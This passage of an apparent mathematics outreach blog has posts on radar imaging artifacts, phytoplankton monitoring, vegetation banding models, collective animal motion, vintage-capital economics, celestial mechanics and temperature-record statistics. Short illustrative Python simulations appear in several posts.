    Similar problems arise for transforms integrating along other types of curves, for example the transform R that integrates over ellipses with foci on the x-axis. This elliptical transform is related to the model of bistatic radar [4].  In this case, the reconstruction operator includes a backprojection plus a sharpening algorithm.  The ellipses have foci in the interval [-3,3] along the x-axis.  The function to be reconstructed is the characteristic function of a disk above the x-axis.  Two important limitations of backprojection reconstruction methods are visible in this reconstruction.  First, the top and bottom of the disk are visible but the sides are not.  Second, there is a copy of the disk below the x-axis, although the object is above the axis. This is to be expected because the ellipses are all symmetric with respect to the x-axis—an object above the axis would give the same data as its mirror image below the axis.

    Figure 3 Reconstruction of a disk on the y-axis from integrals over ellipses centered on the x-axis and with foci in [-3,3].  Notice that some boundaries of the disk are missing.  There is a copy of the disk below the axis [Howard Levinson, Senior Honors Thesis, Tufts University, 2011].

    This same left-right ambiguity happens in synthetic aperture radar [5] [7], and it is important to understand the nature of the artifacts and why they appear.  As can be seen in Figure 3, there is an artifact below the flight path.  The artifact is as pronounced as the original disk, and microlocal analysis shows that such artifacts will always be as strong as the original object (e.g., [1]).   However, if the flight path is not straight, microlocal analysis shows that the artifacts change position, and in certain cases, some artifacts can be eliminated [2, 6]. This problem comes up in other areas, such as electron microscopy and SPECT [3].

    REFERENCES

    [1]   G. Ambartsoumian, R. Felea, V. Krishnan, C. Nolan, and E.T. Quinto, A class of singular Fourier integral operators in synthetic aperture radar imaging,  Journal of Functional Analysis, 264 (2013), 246-269.

    [2]   R. Felea, Displacement of artifacts in inverse scattering, Inverse Problems 23 (2007) 1519–1531.

    [3]   R. Felea and E.T. Quinto, The microlocal properties of the local 3-D SPECT operator, SIAM J. Math Anal., 43 (2011), 1145–1157.

    [4]   V. Krishnan and E.T. Quinto, Microlocal aspects of bistatic synthetic aperture radar imaging, Inverse Problems and Imaging, 5 (2011), 659-674.

    [5]   C.J. Nolan and M. Cheney, Microlocal analysis of synthetic aperture radar imaging. J. Fourier Anal. Appl., 10(2) (2004), 133–148.

    [6]   P. Stefanov and G. Uhlmann, Is a curved flight path in SAR better than a straight one?, SIAM J. Appl. Math., 2013, to appear.

    [7]   L. Wang, C.E. Yarman, and B. Yazici, Theory of Passive Synthetic Aperture Imaging, in Excursions in Harmonic Analysis, Volume 1, Applied and Numerical Harmonic Analysis (ANHA) series, Springer-Birkhäuser, T.D. Andrews, R. Balan, J.J. Benedetto, W. Czaja, and K.A. Okoudjou (eds.), 2013, ISBN 978-0-8176-8375-7.

    Gaik Ambartsoumian, University of Texas, Arlington, TX
    Raluca Felea, Rochester Institute of Technology, NY
    Venky Krishnan, Tata Institute of Fundamental Research Centre for Applicable Mathematics, Bangalore, India
    Cliff Nolan, University of Limerick, Ireland
    Todd Quinto, Tufts University, Medford, MA

    Posted in Imaging, Mathematics | Leave a comment

    Ocean Acidification and Phytoplankton

    The health of the world’s oceans has been in the news a lot over the last few months. Recent reports suggest that the oceans are absorbing carbon dioxide at unprecedented rates. The ocean is the dominant player in the global carbon cycle, and the sequestering of more carbon dioxide—a major greenhouse gas—sounds like a good thing. However, researchers have measured significant increases in ocean acidity, and they worry that this will have a negative impact on marine life, especially phytoplankton.

    That would be a big deal, as phytoplankton, which are the foundation of the ocean food chain, are vitally important to life on Earth. They capture the radiant energy from the sun, converting carbon dioxide into organic matter, and they produce half of the Earth’s oxygen as a by-product.

    The amount and distribution of phytoplankton in the world’s oceans are measured in two ways. Remote sensing satellites in space detect chlorophyll pigments by quantifying how green the oceans are. Since the amount of phytoplankton is proportional to that of chlorophyll, this technique measures the amount of near-surface chlorophyll over a very large scale.

    A second, more accurate and mathematically intensive approach uses special cameras lowered into the ocean to measure the radiance field in the water, both at the surface and at various depths. These measurements are then used to infer the properties of the water and its constituents. The ocean’s radiance field is determined primarily by the sun and sky and is influenced by a host of factors, including the behavior of the air-sea interface, the inherent optical properties of the water, scattering effects, etc. Determining the makeup of the water from the measured radiance distribution has proven to be a difficult inverse problem for oceanographers to solve.

    The first step to solving this problem is having a precise specification of the radiance field. This provides oceanographers with the means to calculate quantities that can be used to assess phytoplankton populations. This is the subject of work by researchers Marlon Lewis and Jianwei Wei of Dalhousie University in Nova Scotia, supported by the Mitacs Accelerate internship program.

    Lewis and Wei helped to develop a new camera that can be used as an oceanographic radiometer. The high-resolution device makes it possible to resolve the spherical radiance distribution at high frequency, both at the surface and at depth. Their work established the precision and reliability of the radiance camera and has provided scientists with a new tool to monitor phytoplankton populations as well as the health of the world’s oceans.

    Dr. Arvind Gupta,
    CEO & Scientific Director
    Mitacs

    Posted in Biosphere, Inverse Problems, Ocean | Leave a comment

    AGU Releases Revised Position Statement on Climate Change

    The American Geophysical Union (AGU) recently released a revised version of its position statement on climate change. Titled “Human-induced Climate Change Requires Urgent Action,” the statement declares that “humanity is the major influence on the global climate change observed over the past 50 years” and that “rapid societal responses can significantly lessen negative outcomes.”

    Learn more.

    Read the full statement (pdf).

    Posted in Climate Change | Leave a comment

    How Vegetation Competes for Rainfall in Dry Regions

    The greater the plant density in a given area, the greater the amount of rainwater that seeps into the ground. This is due to a higher presence of dense roots and organic matter in the soil. Since water is a limited resource in many dry ecosystems, such as semi-arid environments and semi-deserts, there is a benefit to vegetation to adapt by forming closer networks with little space between plants.

    Desert steppes in Yol Valley in Mongolia. Photo Credit: Christineg (Source: Dreamstime)

    Tiger bush plateau in Niger (vertical aerial view). Vegetation is dominated by Combretum micranthum and Guiera senegalensis. Image size: 5 x 5 km on the ground. Satellite image from the declassified Corona KH-4A national intelligence reconnaissance system, 1965-12-31. Courtesy of the U.S. Geological Survey. Photo source: Wikimedia

    Hence, vegetation in semi-arid environments (or regions with low rainfall) self-organizes into patterns or “bands.” The patterns consist of stripes of vegetation running parallel to the contours of a hill, interlaced with stripes of bare ground. Banded vegetation is common where there is low rainfall. In a paper published last month in the SIAM Journal on Applied Mathematics, author Jonathan A. Sherratt uses a mathematical model to determine the levels of precipitation within which such pattern formation occurs.

    “Vegetation patterns are a common feature in semi-arid environments, occurring in Africa, Australia and North America,” explains Sherratt. “Field studies of these ecosystems are extremely difficult because of their remoteness and physical harshness; moreover there are no laboratory replicates. Therefore mathematical modeling has the potential to be an extremely valuable tool, enabling prediction of how pattern vegetation will respond to changes in external conditions.”

    Several mathematical models have attempted to address banded vegetation in semi-arid environments, of which the oldest and most established is a system of partial differential equations, called the Klausmeier model.

    The Klausmeier model is based on a water redistribution hypothesis, which assumes that rain falling on bare ground infiltrates only slightly; most of it runs downhill in the direction of the next vegetation band. It is here that rain water seeps into the soil and promotes growth of new foliage. This implies that moisture levels are higher on the uphill edge of the bands. Hence, as plants compete for water, bands move uphill with each generation. This uphill migration of bands occurs as new vegetation grows upslope of the bands and old vegetation dies on the downslope edge.

    In this paper, the author uses the Klausmeier model, which is a system of reaction-diffusion-advection equations, to determine the critical rainfall level needed for pattern formation based on a variety of ecological parameters, such as rainfall, evaporation, plant uptake, downhill flow, and plant loss. He also investigates the uphill migration speeds of the bands. “My research focuses on the way in which patterns change as annual rainfall varies. In particular, I predict an abrupt shift in pattern formation as rainfall is decreased, which dramatically affects ecosystems,” says Sherratt. “The mathematical analysis enables me to derive a formula for the minimum level of annual rainfall for which banded vegetation is viable; below this, there is a transition to complete desert.”
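    To give a concrete sense of how such simulations look, here is a minimal Python sketch of the standard nondimensional form of the Klausmeier equations on a one-dimensional hillslope (plant density u, water w, rainfall A, plant loss B, downhill water flow speed nu); the parameter values, initial data, and periodic boundaries are illustrative assumptions and are not taken from Sherratt's paper.

        import numpy as np

        n, L = 400, 100.0
        dx, dt = L / n, 1e-3
        A, B, nu = 1.0, 0.45, 182.5               # illustrative rainfall, plant loss, water advection

        rng = np.random.default_rng(2)
        u = 1.0 + 0.1 * rng.random(n)             # perturbed vegetated state
        w = A * np.ones(n)

        def ddx(f):   # upwind difference for the downhill water flow term
            return (np.roll(f, -1) - f) / dx

        def lap(f):   # Laplacian for plant dispersal (periodic for simplicity)
            return (np.roll(f, -1) - 2 * f + np.roll(f, 1)) / dx**2

        for _ in range(200000):                   # integrate to t = 200
            growth = w * u**2
            u += dt * (growth - B * u + lap(u))
            w += dt * (A - w - growth + nu * ddx(w))

        # Depending on A, the long-time state is uniform vegetation, a train of
        # uphill-migrating bands, or bare desert; the critical rainfall below which
        # only desert survives is the quantity estimated analytically in the paper.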

    The model has value in making resource decisions and addressing environmental concerns. “Since many semi-arid regions with banded vegetation are used for grazing and/or timber, this prediction has significant implications for land management,” Sherratt says. “Another issue for which mathematical modeling can be of value is the resilience of patterned vegetation to environmental change. This type of conclusion raises the possibility of using mathematical models as an early warning system that catastrophic changes in the ecosystem are imminent, enabling appropriate action (such as reduced grazing).”

    The simplicity of the model allows the author to make detailed predictions, but more realistic models are required to further this work. “All mathematical models are a compromise between the complexity needed to adequately reflect real-world phenomena, and the simplicity that enables the application of mathematical methods. My paper concerns a relatively simple model for vegetation patterning, and I have been able to exploit this simplicity to obtain detailed mathematical predictions,” explains Sherratt. “A number of other researchers have proposed more realistic (and more complex) models, and corresponding study of these models is an important area for future work. The mathematical challenges are considerable, but the rewards would be great, with the potential to predict things such as critical levels of annual rainfall with a high degree of quantitative accuracy.”

    With 2013 being the year of “Mathematics of Planet Earth (MPE),” mathematics departments and societies across the world are highlighting the role of the mathematical sciences in the scientific effort to understand and deal with the multifaceted challenges facing our planet and our civilization. “The wider field of mathematical modeling of ecosystem-level phenomena has the potential to make a major and quite unique contribution to our understanding of our planet,” says Sherratt.

    View the complete nugget article here.
     
    Source Article:
    Jonathan A. Sherratt, Pattern Solutions of the Klausmeier Model for Banded Vegetation in Semi-arid Environments V: The Transition from Patterns to Desert, SIAM Journal on Applied Mathematics, 73 (4), 1347–1367 (Online publish date: July 3, 2013).
    The article will be available for free at the above link from September 4 – December 4, 2013.

    About the author:
    Jonathan A. Sherratt is a professor in the Department of Mathematics at Heriot-Watt University, and at Maxwell Institute for Mathematical Sciences in Edinburgh, United Kingdom.

    Posted in Biosphere, Mathematics, Patterns | Leave a comment

    The Unreasonable Effectiveness of Collective Animal Behavior

    Observing collective phenomena such as the movement of a flock of birds, a school of fish, or a migrating population of ungulates is a source of fascination because of the mystery behind the spontaneous formation of the aggregating behavior and the apparent cohesiveness of the movements. However, they can also be the cause of a major environmental and social problem when one thinks, for example, of the flight of a swarm of voracious locusts ravaging crops in various parts of the world and putting many communities under severe stress.

    Collective movement of animals can be defined as the spontaneous formation of animal groups and their coordinated motion. As a ubiquitous biological phenomenon, its study has intrinsic interest. But it is also critical for the design of strategies to prevent the process of aggregation of locusts before it happens, or to perturb or possibly stop its progression and the destruction of crops once it has started. On a lighter note, a dance company used the scientific study of collective movement in an original initiative to bridge the gap between scientific and artistic languages.

    Collective movement of animals can be modeled in a Lagrangian mode or in an Eulerian mode. The Lagrangian mode is an “individual-based” modeling strategy, where the movements of individuals are simulated under simple rules for their mutual interactions. The emerging aggregations and collective motions are observed directly. The interaction rules can be defined in terms of distances between group members or topologically in terms of a collection of neighbors, independently of distance.
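    A minimal Lagrangian sketch in Python, assuming the usual repulsion/alignment/attraction zones with illustrative radii and weights (none of these values come from the studies cited below), might look as follows.

        import numpy as np

        rng = np.random.default_rng(0)
        N = 100
        pos = rng.uniform(0, 20, size=(N, 2))
        vel = rng.normal(size=(N, 2))
        vel /= np.linalg.norm(vel, axis=1, keepdims=True)

        r_rep, r_ali, r_att = 1.0, 3.0, 8.0       # zone radii (illustrative)
        speed, dt = 0.5, 0.1

        for _ in range(500):
            d = pos[:, None, :] - pos[None, :, :]          # pairwise displacements
            dist = np.linalg.norm(d, axis=-1) + np.eye(N)  # avoid self-interaction
            rep = (d * (dist < r_rep)[..., None] / dist[..., None]**2).sum(axis=1)
            ali = (vel[None, :, :] * ((dist >= r_rep) & (dist < r_ali))[..., None]).sum(axis=1)
            att = (-d * ((dist >= r_ali) & (dist < r_att))[..., None]).sum(axis=1)
            vel = vel + dt * (rep + 0.5 * ali + 0.05 * att)
            vel /= np.linalg.norm(vel, axis=1, keepdims=True) + 1e-12
            pos += speed * dt * vel
        # For these choices the group ends up loosely aligned and cohesive; the
        # emerging aggregation is read off directly from pos and vel.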

    In the Eulerian mode, one follows the evolution of animal densities using equations similar to those used in fluid dynamics or statistical mechanics. One makes hypotheses about the social interactions between individuals in a group in terms of repulsion, attraction, and alignment. Repulsion is strongest in a zone close to an individual, while attraction is strongest in a zone furthest from the subject. These two zones can overlap, and the alignment zone sits somewhere between the two zones. In the case of a herd of prey, individuals want to keep a comfortable distance between each other and repel the ones that are too close; on the other hand, an individual too far from the group is vulnerable to predators and will seek to get closer to the group. These social interactions are often nonlocal and can be modeled using integration of so-called interaction kernels. A typical example of an interaction kernel is a Gaussian function with its peak at the distance where the interaction is strongest. One can also define modes of communication corresponding to visual, auditory or tactile interactions and depending on whether individuals in a group move towards or away from each other. These modes of communication encode topological properties of the animal groups.

    Topaz et al. modeled locust aggregation using an Eulerian approach. They show that the solitary state of locusts becomes unstable as the population density reaches a critical value. They also show the occurrence of hysteresis in the gregarious mass fraction of locusts, which means that to dissolve a locust swarm, population densities have to be reduced to a level well below the critical density at which the swarm forms. This analysis suggests that control strategies that prevent the formation of swarms by limiting the population density would probably have more success than trying to reduce the population density once the swarm is formed.

    Theoretical and simulation studies with the above modeling methods help to demystify the mechanisms of collective motion. They produce new hypotheses for empirical studies and are also important in understanding and controlling insect invasions. Moreover, they have led to the development of new mathematics and improvement of numerical simulation algorithms. A better understanding of these collective phenomena does not remove any of the magic of the gracious ballet of a flock of birds; in fact, it adds to their enchantment.

    Pietro-Luciano Buono
    University of Ontario Institute of Technology (UOIT)
    Luciano.buono@uoit.ca

    References:

    • V. Grimm and S.F. Railsback. Individual-based Modeling and Ecology. Princeton University Press, 2005.
    • Ian Couzin’s lab: http://icouzin.princeton.edu/
    • M. Ballerini, N. Cabibbo, R. Candelier, A. Cavagna, E. Cisbani, I. Giardina, V. Lecomte, A. Orlandi, G. Parisi, A. Procaccini, M. Viale and V. Zdravkovic. Interaction ruling animal collective behavior depends on topological rather than metric distance: Evidence from a field study. PNAS 105, (2008), 1232-1237.
    • R. Eftimie, G. de Vries, M.A. Lewis, and F. Lutscher. Modeling group formation and activity patterns in self-organizing collectives of individuals. Bulletin of Mathematical Biology 69 (2007), 1537-1565.
    • C.M. Topaz, M.R. D’Orsogna, L. Edelstein-Keshet, A.J. Bernoff. Locust Dynamics: Behavioral Phase Change and Swarming. PLoS Computational Biology 8 (2012).
    Posted in Biosphere, Mathematics, Patterns | Leave a comment

    Dynamic Programming for Optimal Control Problems in Economics

    Fausto Gozzi
    Libera Università Internazionale degli Studi Sociali (LUISS)
    Rome

    1. Some history

    The theory of optimal control, starting in the 50’s, has found many applications in various areas of the natural and social sciences. Over the years, as more difficult applied problems have been attacked, the theory has advanced. Here we consider the optimal control theory of infinite dimensional systems, which has recently found interesting applications in theoretical economics, allowing economic models to be made more realistic.

    These infinite dimensional systems are usually dynamical systems whose evolution is described by a partial differential equation (PDE) or a delay differential equation (DDE). They are infinite dimensional in the sense that they can be rephrased as standard ordinary differential equations (ODE’s) in abstract infinite dimensional spaces such as Hilbert or Banach spaces.

    The study of optimal control problems of such systems began in the 70’s with the two main methods of optimal control theory: Bellman’s Dynamic Programming and the Pontryagin Maximum Principle. The main examples motivating such theory usually came from physics and engineering applications, but starting in the 90’s more and more work in the field was motivated by economic and financial applications.

    Here we discuss the use of the Dynamic Programming Method with the associated Hamilton-Jacobi-Bellman (HJB) equations for a particular family of such problems that has been recently studied, namely, the optimal control of heterogeneous systems.

    2. Why model heterogeneity in economics?

    Economic models have traditionally been built under several simplifying assumptions, for a number of reasons including tractability. Among these assumptions, we consider the following three: the representative agent, the homogeneity of capital, and the absence of a spatial dimension.

    Considering a single agent to represent the average behaviour of a large number of consumers, for example, greatly simplifies the analysis of an economic system and has enabled the development of a large and coherent body of economic research. As an example, neoclassical growth theory, which has been tremendously influential, considers a representative consumer and a representative firm in place of thousands (or millions) of separate consumers and firms.

    Capital homogeneity, which is the lumping together of all forms of capital investment, including human capital and physical capital, is a second simplifying assumption often made in economics. Again the neoclassical growth theory makes this assumption and treats capital investments at different times (vintages) as identical. This, of course, is hardly realistic, since new vintages typically embody the latest technical improvements and are likely to be significantly more productive. This was clearly stated by Solow in 1960 when he wrote “…This conflicts with the casual observation that many if not most innovations need to be embodied in new kinds of durable equipment before they can be made effective…”

    Finally, while space has been recognized as a key dimension in several economic decision-making problems for quite a long time, it has been seldom explicitly incorporated even in the models of growth, trade and development where this dimension seems natural. This trend has lasted until the early 90’s as mentioned by Krugman (2010) in a retrospective essay: “…What you have to understand is that in the late 1980s mainstream economists were almost literally oblivious to the fact that economies aren’t dimensionless points in space and to what the spatial dimension of the economy had to say about the nature of economic forces…”

    Beyond analytical simplicity and internal consistency, the prevalence of such simplifying assumptions is due to the widely shared belief that departing from these assumptions would NOT improve our understanding of the main mechanisms behind the observed economic facts and would, at the same time, make economic models analytically intractable. But since the late 90’s, accounting for heterogeneity has become an essential aspect of research. The representative agent assumptions and other homogeneity assumptions have been heavily questioned, and new analytical frameworks explicitly incorporating heterogeneous agents and/or goods have been put forward and studied. Basically, this evolution is due to two important factors.

    • a. A major factor is the emerging view that heterogeneity is needed to explain key economic facts. For example, the resurgence of the vintage capital literature in the late 90’s is fundamentally due to new statistical evidence on the price of durable goods in the US, showing a negative trend in the evolution of the relative price of equipment that is only compatible with embodied technical progress, thus legitimizing the explicit modelling of capital vintages.
    • b. At the same time, the rapid development of computational economics—especially in the last decade—makes it feasible to deal with models having heterogeneous agents. Special issues of the reference journal in the field, Journal of Economic Dynamics and Control, have been devoted to this specific area (issue 1 in 2010 and issue 2 in 2011), suggesting that it is one of the hottest areas in the field of computational economics.

    3. An example of results

    We consider, for example, the vintage capital model. Beginning with the simplest neoclassical growth model (the so-called AK model), one generalizes it to the case where capital is heterogeneous in the sense that it is differentiated by age (vintage capital). The basic equation (the State Equation in the language of optimal control) becomes a differential delay equation. Using Bellman’s Dynamic Programming method it becomes possible to characterize the optimal trajectories, which “should” describe the behavior of the economic system.

    In this case the introduction of heterogeneity allows a more faithful description of the features of this economic system. Indeed, in the graph below (Boucekkine et al.) one can see the behavior of the output y(t) (the production) of the model (after a detrending which is done for the sake of clarity) in the two cases:
    − the horizontal line is the output in the classical AK model;
    − the oscillating line is the output in the AK model with vintage capital.
    [Graph: detrended output y(t) in the two cases described above]
    Fluctuations of the output are a well-known feature that is captured by infinite dimensional optimal control models.
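    The mechanism behind these fluctuations can be reproduced with a few lines of Python; the sketch below uses a simple scalar delayed-adjustment equation y'(t) = -d (y(t - T) - 1) rather than the full vintage-capital model of the references, and all parameter values are illustrative assumptions.

        import numpy as np

        d, T, dt = 0.12, 10.0, 0.01               # adjustment strength, delay, time step
        lag = int(T / dt)
        steps = int(400 / dt)

        y = np.full(steps + lag, 1.2)             # history: output starts 20% above trend
        for n in range(lag, steps + lag - 1):
            y[n + 1] = y[n] - dt * d * (y[n - lag] - 1.0)

        # Because d*T > 1/e, the delayed response overshoots and y oscillates
        # around the trend value 1 with decaying amplitude, which is the
        # qualitative behavior of the detrended output described above.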

    4. Further directions

    Further work needs to be done on heterogeneity resulting from the spatial and population distribution of economic activity. This heterogeneity is a key feature of contemporary economic systems, and a deep study of models incorporating it should provide both more insight into the behavior of such systems and more help for policy makers. In particular, the issues under study are:
    − environmentally sustainable growth regimes;
    − land use;
    − the socio-economic and public finance problems related to ageing on one hand, and to epidemiological threats on the other;
    − the incorporation of the age structure of human populations in the analysis of key economic decisions, like investment in health and/or in pension funds, from both the private and the social optimality points of view.

    References
    Giorgio Fabbri and Fausto Gozzi. Solving optimal growth models with vintage capital: the dynamic programming approach. Journal of Economic Theory 143 (2008), no. 1, 331–373.

    R. Boucekkine, O. Licandro, L.A. Puch, F. del Rio. Vintage capital and the dynamics of the AK model. Journal of Economic Theory 120 (2005), no. 1, 39–72.

    Posted in Economics | Leave a comment

    A Feast of Celestial Mechanics

    While I am a pure mathematician working in dynamical systems, I have always been fascinated by the mathematics of the N-body problem and its applications to celestial mechanics in general, and to the Solar system in particular. This is why I had insisted on the organization of a long-term program on celestial mechanics within MPE2013, and on CRM hosting a workshop on the topic. The workshop Planetary Motions, Satellite Dynamics, and Spaceship Orbits took place at CRM on July 22-26. Co-organizers were Alessandra Celletti, Walter Craig and Florin Diacu.

    The week-long activity brought together the major players of the field. Surprisingly, many of these people had never met before, and the workshop played a structuring role in the community of scientists attached to the theme. The lectures were all inspiring and excellent. For an amateur like me, the workshop was like a school, and it has been an exceptionally rewarding experience.

    Planetary motions are usually modeled through the N-body problem, which is the study of trajectories of N mass particles subject to Newton’s law of gravitation. Since Poincaré, this problem has become the specialty of mathematicians. The underlying dynamical system is nonintegrable as soon as N>2. The lectures of the workshop covered the whole spectrum from N=3 to N very large. Several lectures dealt with the restricted 3-body problem, which is the limit case where two bodies move according to the 2-body problem on conics with a focus at their center of mass and a third body of zero mass is attracted by the two large bodies. This model is useful for studying the movements of objects like satellites, spacecraft or small asteroids subject to the attraction of two large celestial objects.
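    As a small illustration of the kind of system discussed, here is a Python sketch of the planar N-body equations in nondimensional units (G = 1) integrated with a leapfrog scheme; the masses and initial conditions are illustrative assumptions, loosely in the spirit of a star, a planet, and a small third body.

        import numpy as np

        G = 1.0
        m = np.array([1.0, 1e-3, 1e-6])                    # star, planet, small body (illustrative)
        r = np.array([[0.0, 0.0], [1.0, 0.0], [1.1, 0.0]])
        v = np.array([[0.0, 0.0], [0.0, 1.0], [0.0, 0.95]])

        def acc(r):
            d = r[None, :, :] - r[:, None, :]              # displacement from body i to body j
            dist3 = np.linalg.norm(d, axis=-1)**3 + np.eye(len(m))   # guard the diagonal
            return (G * m[None, :, None] * d / dist3[..., None]).sum(axis=1)

        dt = 1e-3
        a = acc(r)
        for _ in range(100000):                            # leapfrog (kick-drift-kick)
            v += 0.5 * dt * a
            r += dt * v
            a = acc(r)
            v += 0.5 * dt * a
        # The symplectic character of the leapfrog step keeps the energy error
        # bounded over long integrations, which matters for celestial mechanics.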

    In the case of N=3, it is known that there are five families of periodic synchronous motions for the three bodies: after a change of coordinates to a moving frame, these special trajectories become equilibrium positions in the new frame, called Lagrange equilibrium points (also libration points). Their associated invariant manifolds play an essential role in organizing the dynamics and the different types of motion. They provide low-energy pathways for interplanetary missions. They can have transversal crossings and help finding chaotic motions and Arnold diffusion.

    Several lectures described the normal forms and their applications. In particular, Gabriella Pinzari described her recent results with Luigi Chierchia showing the existence and nondegeneracy of a Birkhoff normal form for the planetary problem and its consequence for the existence of a large measure set of stable motions and lower-dimensional elliptic tori in phase space, thus solving a problem open for more than 50 years.

    Studying near-collision orbits is a challenge in the N-body problem. In the limit, the system becomes singular, and a desingularization process is necessary to understand the phenomenon. A geometric desingularization was presented by Richard Moeckel, while the lecture of Sergey Bolotin explained how a variational approach enables us to transform the problem to a billiard-type problem with elastic collisions.

    Edward Belbruno was a pioneer of low-energy trajectories. He became famous when his low-energy trajectories to the Moon found an application in 1990. The Japanese had lost contact with the small probe that was supposed to go into lunar orbit, while the main spacecraft MUSES-A, renamed Hiten, was orbiting the Earth. Belbruno's low-energy trajectory allowed sending Hiten to the Moon in 1991 after a 150-day journey. The idea was to use a transfer trajectory to the weak stability boundary of the Moon, with ballistic capture, i.e., no braking necessary to be captured. Belbruno described his recent achievements showing the existence of low-energy routes enabling the transfer of material between planetary systems, with transit times of up to several hundred million years. On the basis of this work it can no longer be excluded that the origin of life on Earth could come from a remote planetary system. I have invited him to describe the details of this fascinating result in a future blog post on September 6.

    Too often, we picture the mechanics of the N-body problem as nondissipative. It is in fact slightly dissipative (for instance, because the atmosphere around the Earth slows down its rotation about its axis), and KAM theory has been adapted to treat these cases. This dissipation plays a major role in obtaining stable motions and in providing rigorous proofs of the stability of these motions with interval-arithmetic numerical techniques.

    Can we explain why the Solar system is exactly as we observe it? Several lectures addressed this issue. While energy is dissipated, angular momentum is preserved. Hence, what is the minimal energy configuration for an N-body system with fixed angular momentum? Dan Scheeres showed that this ill-posed question becomes well-posed if, instead, the question is formulated accounting for finite density distributions, thus leading to a natural “granular mechanics” extension of celestial mechanics. The lecture of Vladislav Sidorenko addressed the problem of understanding the quasi-satellite regime of small celestial bodies like the asteroids and the route from the formation of the Solar system to its present state.

    The case with N large was covered by a spectrum of applications. Stanley Dermott presented the erosion of the asteroid belt under Martian resonances; Martin Duncan presented a model of core accretion for giant planet formation from billions of planetesimals and its numerical simulations; Anne Lemaitre explained the challenges of understanding the dynamics of the tens of thousands of pieces of space debris with diameters between 1 cm and 10 cm, which are too numerous to be followed individually but sufficiently large to represent a real danger. The motion of the debris is simulated with an accurate symplectic integration scheme and a model which takes into account the effects of solar radiation pressure and Earth shadow crossings. The goal is to understand where the space debris is most likely to accumulate. Jacques Laskar discussed paleoclimate reconstruction through the past planetary motions of the Solar System: a strong resonance between the asteroids Ceres and Vesta prevents any precise reconstruction beyond 60 Myr, but a more regular oscillation of the eccentricity of the Earth with period 405 Kyr can nevertheless be used for calibrating climates over the entire Mesozoic era.

    This workshop has really been fascinating.

    Christiane Rousseau

    Posted in Computational Science, Mathematics, Workshop Report | Leave a comment

    Climate Science without Climate Models

    In June 2012, more than 3,000 daily maximum temperature records were broken or tied in the United States, according to the National Climatic Data Center (NCDC) of the U.S. National Oceanic and Atmospheric Administration (NOAA). Meteorologists commented at that time that this number was very unusual. By comparison, in June 2013, only about 1,200 such records were broken or tied. Was that number “normal”? Was it perhaps lower than expected? Was June 2012 (especially the last week of that month) perhaps just an especially warm time period, something that should be expected to happen every now and then? Also in June 2013, about 200 daily minimum temperature records were broken or tied in the United States. Shouldn’t that number be comparable to the number of record daily highs, if everything was “normal”?

    Surprisingly, it is possible to make fairly precise mathematical statements about such temperature extremes (or for that matter, about many other record-setting events) simply by reasoning, almost without any models. Well, not quite. The mathematical framework is that individual numerical observations are random variables. One then has to make a few assumptions. The two main assumptions are that (1) the circumstances under which observations are made do not change, and (2) observations are stochastically independent, that is, knowledge of some observations does not convey any information about any of the other observations. Let’s work with these assumptions for the moment and see what can be said about records.

    Suppose N numerical observations of a certain phenomenon have already been made and a new observation is added. What is the probability that this new observation exceeds all the previous ones? Think about it this way: Each of these N+1 observations has a rank, 1 for the largest value, and N+1 for the smallest value. (For the time being, let’s assume that there are no ties). Thus any particular sequence of N+1 observations defines a sequence of ranks, that is, a permutation of the numbers from 1 to N+1. Since observations are independent and have the same probability distribution (that’s what the two assumptions from above imply), all possible (N+1)! permutations are equally likely. A new record is observed during the last observation if its rank equals 1. There are N! permutations that have this additional property. Therefore, the probability that the last observation is a new record is N!/(N+1)! = 1/(N+1).
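    This 1/(N+1) law is easy to check numerically. The following quick Monte Carlo experiment (an illustration only; the sample size and the normal distribution are arbitrary choices) draws N past observations plus one new one and counts how often the new one is a record.

```python
# Quick Monte Carlo check (illustration only) that a new observation is a
# record with probability 1/(N+1).  The normal distribution and the number of
# trials are arbitrary choices; any continuous distribution gives the same answer.
import numpy as np

rng = np.random.default_rng(0)
N = 50           # number of past observations (e.g. 50 years of daily highs)
trials = 100_000

x = rng.normal(size=(trials, N + 1))                 # N past values + 1 new value per trial
new_is_record = x[:, -1] > x[:, :-1].max(axis=1)     # is the last value a new record?
print(new_is_record.mean(), "vs theoretical", 1 / (N + 1))
# Both numbers should be close to 0.0196, i.e. about 2%.
```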

    This reasoning makes it possible to compute the expected number of record daily high temperatures for a given set of weather stations. For example, there are currently about 5,700 weather stations in the United States at which daily high temperatures are observed. In 1963, there were about 3,000 such stations and in 1923 only about 220. Assuming for simplicity that each of the current stations has been recording daily temperatures for 50 years, one would expect that on a typical day about 2% of all daily high records are broken, resulting in about 3,000 new daily high records per month on average – if the circumstances of temperature measurements remain the same and if the observations at any particular station are independent of each other. It is fairly clear that temperature records for the same date are indeed independent of one another for the same station: knowing the maximum temperature at a particular location on August 27, 2013 does not give one any information about the maximum temperature on the same day a year later. However, the circumstances of observations could change for many different reasons. What if new equipment is used to record temperatures? What if the location of the station is changed? For example, until 1945, daily temperatures in Washington, DC, were recorded at a downtown location (24th and M St.). Since then, measurements have been made at National Airport. National Airport is adjacent to a river, which lowered daily temperature readings compared to downtown. The area around the airport has, however, become more urban over recent decades, possibly leading to higher temperature readings (the well-known urban heat island effect). And what about climate change?

    Perhaps it is better to use a single climate record and not thousands. Consider for example the global mean temperature record that is shown in the blog post of August 20. It shows that the largest global mean temperature for the 50 years from 1950 to 1999 (recorded in 1998) was exceeded twice in the 11 years from 2000 to 2010. The second-highest global mean temperature for these 50 years (that of 1997) was exceeded in 10 out of the 11 years between 2000 and 2010. Can this be a coincidence?

    There is a mathematical theory to study such questions. Given a reference value equal to the $m$th largest out of $N$ observations, any observation out of $n$ additional ones that exceeds this reference value is called an “exceedance”. For example, we might be interested in the probability of observing two exceedances of the largest value out of 50 during 11 additional observations. A combinatorial argument implies that the probability of seeing $k$ exceedances of the $m$th largest observation out of $N$ when $n$ additional observations are made equals

    \[ \frac{C(m+k-1,\,k)\; C(N-m+n-k,\,n-k)}{C(N+n,\,n)} , \]

    where C(r,s) is the usual binomial coefficient. The crucial assumption is again that observations are independent and come from the same probability distribution.

    Applied to the global mean temperature record, the formula implies that the probability of two or more exceedances of a 50 year record during an 11 year period is no more than 3%. The probability of 10 exceedances of the second-highest observation from 50 years during an 11 year period is tiny – of the order of 0.0000001%. Yet these exceedances were actually observed during the last decade.
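    Both figures quoted above follow directly from the exceedance formula. The short script below (just an arithmetic check, using Python's math.comb) reproduces them.

```python
# Reproducing the two probabilities quoted above (arithmetic check only).
from math import comb

def p_exceedances(k, m, N, n):
    """Probability of exactly k exceedances of the m-th largest of N past
    observations among n new ones (i.i.d. observations, continuous distribution)."""
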